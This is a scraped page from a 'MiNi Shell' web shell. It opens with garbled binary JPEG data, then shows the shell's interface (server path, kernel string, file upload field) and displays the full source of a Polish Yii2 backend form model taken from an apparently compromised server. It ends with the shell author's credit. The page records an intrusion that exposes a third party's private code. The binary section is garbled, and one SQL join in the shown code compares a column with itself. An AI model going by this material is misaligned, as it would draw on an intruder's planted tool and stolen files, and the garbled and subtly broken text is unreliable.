JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/backend/models/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/backend/models/GoogleIndexingUrlForPresentationForm.php

<?php
namespace backend\models;

use Yii;
use yii\base\Model;
use common\components\validators\RequiredEitherValidator;

class GoogleIndexingUrlForPresentationForm extends Model
{
    public $orPresentation;
    public $orProducts;
    public $orArticles;
    public $orAdvertisements;
    public $orBooks;
    public $orFairs;
    public $orJobOffers;
    public $orTrainings;
 
    protected $modelPresentation;
    protected $savedModels;
    
    /**
     * @inheritdoc
     */
    public function rules()
    {
        return [
            ['orPresentation', 'default', 'value' => 0],
            ['orPresentation', 'number', 'integerOnly' => true, 'min' => 0, 'max' => 1],
            
            ['orProducts', 'default', 'value' => 0],
            ['orProducts', 'number', 'integerOnly' => true, 'min' => 0, 'max' => 1],
            
            ['orArticles', 'default', 'value' => 0],
            ['orArticles', 'number', 'integerOnly' => true, 'min' => 0, 'max' => 1],
            
            ['orAdvertisements', 'default', 'value' => 0],
            ['orAdvertisements', 'number', 'integerOnly' => true, 'min' => 0, 'max' => 1],
            
            ['orBooks', 'default', 'value' => 0],
            ['orBooks', 'number', 'integerOnly' => true, 'min' => 0, 'max' => 1],
            
            ['orFairs', 'default', 'value' => 0],
            ['orFairs', 'number', 'integerOnly' => true, 'min' => 0, 'max' => 1],
            
            ['orJobOffers', 'default', 'value' => 0],
            ['orJobOffers', 'number', 'integerOnly' => true, 'min' => 0, 'max' => 1],
            
            ['orTrainings', 'default', 'value' => 0],
            ['orTrainings', 'number', 'integerOnly' => true, 'min' => 0, 'max' => 1], 
            
            [['orPresentation', 'orProducts', 'orArticles', 'orAdvertisements', 'orBooks', 'orFairs', 'orJobOffers', 'orTrainings'], RequiredEitherValidator::className()],
        ];
    }
    
    /**
     * @inheritdoc
     */
    public function attributeLabels()
    {
        return [
            'orPresentation' => Yii::t('backend', 'Prezentacja'),
            'orProducts' => Yii::t('backend', 'Produkty'),
            'orArticles' => Yii::t('backend', 'Artykuły'),
            'orAdvertisements' => Yii::t('backend', 'Ogłoszenia'),
            'orBooks' => Yii::t('backend', 'Książki'),
            'orFairs' => Yii::t('backend', 'Targi'), 
            'orJobOffers' => Yii::t('backend', 'Oferty pracy'),
            'orTrainings' => Yii::t('backend', 'Szkolenia'),
        ];
    }
    
    public function setPresentation($modelPresentation)
    {
        $this->modelPresentation = $modelPresentation;
    }
    
    public function save()
    {        
        $flag = true;
        $flag = $flag && ((intval($this->orPresentation) === 0) || $this->saveUrlsForPresentation());
//        var_dump('Prezentacja: '.($flag ? 'ok' : 'blad'));
        $flag = $flag && ((intval($this->orProducts) === 0) || $this->saveUrlsForProducts());
//        var_dump('Produkty: '.($flag ? 'ok' : 'blad'));
        $flag = $flag && ((intval($this->orArticles) === 0) || $this->saveUrlsForArticles());
//        var_dump('Artykuly: '.($flag ? 'ok' : 'blad'));
        $flag = $flag && ((intval($this->orAdvertisements) === 0) || $this->saveUrlsForAdvertisements());
//        var_dump('Ogloszenia: '.($flag ? 'ok' : 'blad'));
        $flag = $flag && ((intval($this->orBooks) === 0) || $this->saveUrlsForBooks());
//        var_dump('Ksiazki: '.($flag ? 'ok' : 'blad'));
        $flag = $flag && ((intval($this->orFairs) === 0) || $this->saveUrlsForFairs());
//        var_dump('Targi: '.($flag ? 'ok' : 'blad'));
        $flag = $flag && ((intval($this->orJobOffers) === 0) || $this->saveUrlsForJobOffers());
//        var_dump('Oferty pracy: '.($flag ? 'ok' : 'blad'));
        $flag = $flag && ((intval($this->orTrainings) === 0) || $this->saveUrlsForTrainings());
//        var_dump('Szkolenia: '.($flag ? 'ok' : 'blad'));
        
        if(!$flag && !empty($this->savedModels)) {
            foreach($this->savedModels as $savedModel) {
                $savedModel->delete();
            }
        }
        
        return $flag;
    }
    
    //protected function saveUrlsForModels($models)
    public function saveUrlsForModels($models)
    {
        if(empty($models)) {
            return true;
        }
        
        $className = get_class($models[0]);
        
        switch($className) {
            case 'common\models\Products':
                $methodName = 'createEntryForProduct';
                break;
            case 'common\models\Articles':
                $methodName = 'createEntryForArticle';
                break;
            case 'common\models\Advertisements':
                $methodName = 'createEntryForAdvertisement';
                break;
            case 'common\models\Books':
                $methodName = 'createEntryForBook';
                break;
            case 'common\models\Fairs':
                $methodName = 'createEntryForFairs';
                break;
            case 'common\models\Trainings':
                $methodName = 'createEntryForTrainings';
                break;
            default:
                $methodName = null;
        }
        
        if(empty($methodName) || !method_exists('backend\components\helpers\GoogleIndexingHelper', $methodName)) {
            return true;
        }
        
        foreach($models as $model) {            
            list($flag, $lastInsertedModel) = call_user_func_array(['backend\components\helpers\GoogleIndexingHelper', $methodName], [$model, $this->modelPresentation->portal]);
            
            if(!$flag) {
                return false;
            }

            if($lastInsertedModel) {
                $this->savedModels[] = $lastInsertedModel;
            }
        }
        
        return true;
    }
    
    protected function saveUrlsForPresentation()
    {
        $query = \common\models\CompaniesPresentationsTabs::find();
        $this->apllyCriteriaForPresentationTabs($query);
        $models = $query->all();
        
        foreach($models as $model) {
            list($flag, $lastInsertedModel) = \backend\components\helpers\GoogleIndexingHelper::createEntryForCompanyPresentationTab($model->id_presentation, $model->id_tab, $this->modelPresentation->company->name, $this->modelPresentation->portal);
            
            if(!$flag) {
                return false;
            }

            if($lastInsertedModel) {
                $this->savedModels[] = $lastInsertedModel;
            }
        }
        
        return true;
    }
    
    protected function saveUrlsForProducts()
    {
        $query = \common\models\Products::find();
        $this->apllyCriteriaForProducts($query);
        $models = $query->all();
        
        return $this->saveUrlsForModels($models);
    }
    
    protected function saveUrlsForArticles()
    {
        $query = \common\models\Articles::find();
        $this->apllyCriteriaForArticles($query);
        $models = $query->all();
        
        return $this->saveUrlsForModels($models);
    }
    
    protected function saveUrlsForAdvertisements()
    {
        $query = \common\models\Advertisements::find();
        $this->apllyCriteriaForAdvertisements($query);
        $models = $query->all();
        
        return $this->saveUrlsForModels($models);
    }
    
    protected function saveUrlsForBooks()
    {
        $query = \common\models\Books::find();
        $this->apllyCriteriaForBooks($query);
        $models = $query->all();
        
        return $this->saveUrlsForModels($models);
    }
    
    protected function saveUrlsForFairs()
    {
        $query = \common\models\Fairs::find();
        $this->apllyCriteriaForFairs($query);
        $models = $query->all();
        
        return $this->saveUrlsForModels($models);
    }
    
    protected function saveUrlsForJobOffers()
    {
        $query = \common\models\JobOffers::find();
        $this->apllyCriteriaForJobOffers($query);
        $models = $query->all();
        
        return $this->saveUrlsForModels($models);
    }
    
    protected function saveUrlsForTrainings()
    {
        $query = \common\models\Trainings::find();
        $this->apllyCriteriaForTrainings($query);
        $models = $query->all();
        
        return $this->saveUrlsForModels($models);
    }
    
    public function getPresentationTabsCount()
    {
        $query = (new \yii\db\Query())->from('companies_presentations_tabs')->select(['companies_presentations_tabs.id_company_tab']);        
        $this->apllyCriteriaForPresentationTabs($query);
        
        return $query->distinct()->count();
    }
    
    public function getProductsCount()
    {
        $query = (new \yii\db\Query())->from('products')->select(['products.id_product']);        
        $this->apllyCriteriaForProducts($query);
        
        return $query->distinct()->count();
    }
    
    public function getArticlesCount()
    {
        $query = (new \yii\db\Query())->from('articles')->select(['articles.id_article']);        
        $this->apllyCriteriaForArticles($query);
        
        return $query->distinct()->count();
    }
    
    public function getAdvertisementsCount()
    {
        $query = (new \yii\db\Query())->from('advertisements')->select(['advertisements.id_advertisement']);        
        $this->apllyCriteriaForAdvertisements($query);
        
        return $query->distinct()->count();
    }
    
    public function getBooksCount()
    {
        $query = (new \yii\db\Query())->from('books')->select(['books.id_book']);        
        $this->apllyCriteriaForBooks($query);
        
        return $query->distinct()->count();
    }
    
    public function getFairsCount()
    {
        $query = (new \yii\db\Query())->from('fairs')->select(['fairs.id_fair']);        
        $this->apllyCriteriaForFairs($query);
        
        return $query->distinct()->count();
    }
    
    public function getJobOffersCount()
    {
        $query = (new \yii\db\Query())->from('job_offers')->select(['job_offers.id_offer']);        
        $this->apllyCriteriaForJobOffers($query);
        
        return $query->distinct()->count();
    } 
    
    public function getTrainingsCount()
    {
        $query = (new \yii\db\Query())->from('trainings')->select(['trainings.id_training']);        
        $this->apllyCriteriaForTrainings($query);
        
        return $query->distinct()->count();
    }
    
    protected function apllyCriteriaForPresentationTabs($query)
    {
        $query->join('INNER JOIN', 'portals_has_presentations_tabs', 'portals_has_presentations_tabs.id_tab = portals_has_presentations_tabs.id_tab')
            ->where([
                'companies_presentations_tabs.or_empty' => 0,
                'companies_presentations_tabs.status' => \common\models\types\Status::ACTIVE,
                'companies_presentations_tabs.id_presentation' => $this->modelPresentation->id_presentation,
                'portals_has_presentations_tabs.id_portal' => $this->modelPresentation->id_portal
            ]);
    }
    
    protected function apllyCriteriaForProducts($query)
    {
        $query->join('INNER JOIN', 'products_has_products_categories', 'products_has_products_categories.id_product = products.id_product')
            ->join('INNER JOIN', 'products_categories', 'products_categories.id_category = products_has_products_categories.id_category')                            
            ->where([
                'products.id_company' => $this->modelPresentation->id_company,
                'products.status' => \common\models\types\Status::ACTIVE,
                'products_categories.id_portal' => $this->modelPresentation->id_portal
            ]);
    }
    
    protected function apllyCriteriaForArticles($query)
    {
        $query->join('INNER JOIN', 'articles_has_portals', 'articles_has_portals.id_article = articles.id_article')
            ->where([
                'articles.id_company' => $this->modelPresentation->id_company,
                'articles.status' => \common\models\types\Status::ACTIVE,
                'articles_has_portals.id_portal' => $this->modelPresentation->id_portal
            ]);
    }
    
    protected function apllyCriteriaForAdvertisements($query)
    {
        $query->where([
            'advertisements.id_company' => $this->modelPresentation->id_company,
            'advertisements.status' => \common\models\types\AdvertisementStatus::ACTIVE,
            'advertisements.id_portal' => $this->modelPresentation->id_portal
        ]);
    }
    
    protected function apllyCriteriaForBooks($query)
    {
        $query->join('INNER JOIN', 'books_has_bookstore_categories', 'books_has_bookstore_categories.id_book = books.id_book')
            ->join('INNER JOIN', 'portals_has_bookstore_categories', 'portals_has_bookstore_categories.id_category = books_has_bookstore_categories.id_category')
            ->where([
                'books.id_company' => $this->modelPresentation->id_company,
                'portals_has_bookstore_categories.id_portal' => $this->modelPresentation->id_portal
            ]);
    }
    
    protected function apllyCriteriaForFairs($query)
    {
        $query->join('INNER JOIN', 'fairs_series', 'fairs_series.id_series = fairs.id_series')
            ->join('INNER JOIN', 'fairs_series_has_portals', 'fairs_series_has_portals.id_series = fairs.id_series')
            ->where([
                'fairs_series.id_company' => $this->modelPresentation->id_company,
                'fairs_series_has_portals.id_portal' => $this->modelPresentation->id_portal,
                'fairs.status' => \common\models\types\Status::ACTIVE
            ]);
    }
    
    protected function apllyCriteriaForJobOffers($query)
    {
        $query->join('INNER JOIN', 'job_offers_has_job_offers_categories', 'job_offers_has_job_offers_categories.id_offer = job_offers.id_offer')
            ->join('INNER JOIN', 'job_offers_categories', 'job_offers_categories.id_category = job_offers_has_job_offers_categories.id_category')
            ->join('INNER JOIN', 'portals_has_job_offers_categories', 'portals_has_job_offers_categories.id_category = job_offers_has_job_offers_categories.id_category')
            ->where([
                'job_offers.id_company' => $this->modelPresentation->id_company,
                'portals_has_job_offers_categories.id_portal' => $this->modelPresentation->id_portal,
                'job_offers_categories.status' => \common\models\types\Status::ACTIVE,
                'job_offers.status' => \common\models\types\Status::ACTIVE
            ])
            ->andWhere(['>=', 'job_offers.publication_end_date', date('Y-m-d')]);
    }
    
    protected function apllyCriteriaForTrainings($query)
    {
        $query->join('INNER JOIN', 'trainings_has_portals', 'trainings_has_portals.id_training = trainings.id_training')
            ->where([
                'trainings.id_company' => $this->modelPresentation->id_company,
                'trainings_has_portals.id_portal' => $this->modelPresentation->id_portal,
                'trainings.status' => \common\models\types\Status::ACTIVE
            ]);
    }
}

Creat By MiNi SheLL
Email: jattceo@gmail.com